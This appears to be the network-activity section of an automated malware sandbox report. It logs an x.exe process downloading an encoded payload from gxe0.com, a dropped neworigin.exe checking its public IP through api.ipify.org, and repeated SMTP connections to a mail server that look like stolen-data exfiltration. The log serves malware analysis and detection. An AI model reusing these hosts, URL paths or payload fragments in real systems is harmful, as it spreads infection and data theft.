                                                                                                                  0192.168.2.549705198.252.105.914434308C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-12 14:28:10 UTC161OUTGET /yak/233_Wisrysxlfss HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                  Host: gxe0.com
                                                                                                                  2024-11-12 14:28:10 UTC365INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  last-modified: Mon, 28 Oct 2024 23:14:08 GMT
                                                                                                                  accept-ranges: bytes
                                                                                                                  content-length: 2562520
                                                                                                                  date: Tue, 12 Nov 2024 14:28:10 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  2024-11-12 14:28:10 UTC1003INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65
                                                                                                                  Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
                                                                                                                  2024-11-12 14:28:10 UTC14994INData Raw: 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71
                                                                                                                  Data Ascii: muKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uq
                                                                                                                  2024-11-12 14:28:10 UTC16384INData Raw: 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70
                                                                                                                  Data Ascii: 7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mp
                                                                                                                  2024-11-12 14:28:10 UTC16384INData Raw: 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31
                                                                                                                  Data Ascii: qOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1
                                                                                                                  2024-11-12 14:28:10 UTC16384INData Raw: 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35
                                                                                                                  Data Ascii: rmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5
                                                                                                                  2024-11-12 14:28:10 UTC16384INData Raw: 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30
                                                                                                                  Data Ascii: Ke4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0
                                                                                                                  2024-11-12 14:28:10 UTC16384INData Raw: 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a
                                                                                                                  Data Ascii: KSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6Gz
                                                                                                                  2024-11-12 14:28:11 UTC16384INData Raw: 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79
                                                                                                                  Data Ascii: 6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqy
                                                                                                                  2024-11-12 14:28:11 UTC16384INData Raw: 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65
                                                                                                                  Data Ascii: rm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52e
                                                                                                                  2024-11-12 14:28:11 UTC387INData Raw: 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70
                                                                                                                  Data Ascii: KWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisrip


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549706104.26.13.2054436488C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-12 14:28:18 UTC155OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                  Host: api.ipify.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-11-12 14:28:18 UTC399INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 12 Nov 2024 14:28:18 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 14
                                                                                                                  Connection: close
                                                                                                                  Vary: Origin
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8e17352f2c33477c-DFW
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1984&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=1388302&cwnd=251&unsent_bytes=0&cid=8eb7d46fea5ee94c&ts=648&x=0"
                                                                                                                  2024-11-12 14:28:18 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
                                                                                                                  Data Ascii: 173.254.250.68


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.549721104.26.13.2054437592C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-12 14:28:32 UTC155OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                  Host: api.ipify.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-11-12 14:28:32 UTC398INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 12 Nov 2024 14:28:32 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 14
                                                                                                                  Connection: close
                                                                                                                  Vary: Origin
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8e1735856e5447ff-DFW
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=989&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2601976&cwnd=251&unsent_bytes=0&cid=197e4dcd1a40346c&ts=856&x=0"
                                                                                                                  2024-11-12 14:28:32 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
                                                                                                                  Data Ascii: 173.254.250.68


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.549755104.26.13.2054437928C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-12 14:28:39 UTC155OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                  Host: api.ipify.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-11-12 14:28:39 UTC399INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 12 Nov 2024 14:28:39 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 14
                                                                                                                  Connection: close
                                                                                                                  Vary: Origin
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8e1735b48d1947a5-DFW
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2337368&cwnd=251&unsent_bytes=0&cid=d1f0b3101c27b6a0&ts=380&x=0"
                                                                                                                  2024-11-12 14:28:39 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
                                                                                                                  Data Ascii: 173.254.250.68


                                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                  Nov 12, 2024 15:28:22.175287962 CET5874970751.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:22 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:28:22.176043987 CET49707587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:28:22.420356035 CET5874970751.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:28:22.420943022 CET49707587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:28:22.665380001 CET5874970751.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:28:26.834248066 CET5874971051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:26 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:28:26.834383965 CET49710587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:28:26.834752083 CET5874971051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:26 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:28:27.075897932 CET5874971051.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:28:27.079176903 CET49710587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:28:27.320044994 CET5874971051.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:28:34.575484991 CET5874973751.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:34 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:28:34.582412958 CET49737587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:28:34.823730946 CET5874973751.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:28:34.823991060 CET49737587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:28:35.065475941 CET5874973751.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:28:42.214093924 CET5874976251.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:42 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:28:42.214375019 CET49762587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:28:42.454128027 CET5874976251.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:28:42.454351902 CET49762587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:28:42.694175005 CET5874976251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:28:46.178294897 CET5874978351.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:46 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:28:46.178523064 CET49783587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:28:46.715003967 CET5874978351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:28:46.715420961 CET49783587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:28:46.715527058 CET5874978351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:28:46.955425978 CET5874978351.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:30:24.322674036 CET5875078651.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:30:23 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:30:24.322762012 CET5875078651.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:30:23 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:30:24.322813034 CET50786587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:30:24.570666075 CET5875078651.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:30:24.571088076 CET50786587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:30:24.818229914 CET5875078651.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:30:29.413234949 CET5875078751.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:30:29 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:30:29.413419008 CET50787587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:30:29.654483080 CET5875078751.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:30:29.654666901 CET50787587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:30:29.896200895 CET5875078751.195.88.199192.168.2.5220 TLS go ahead
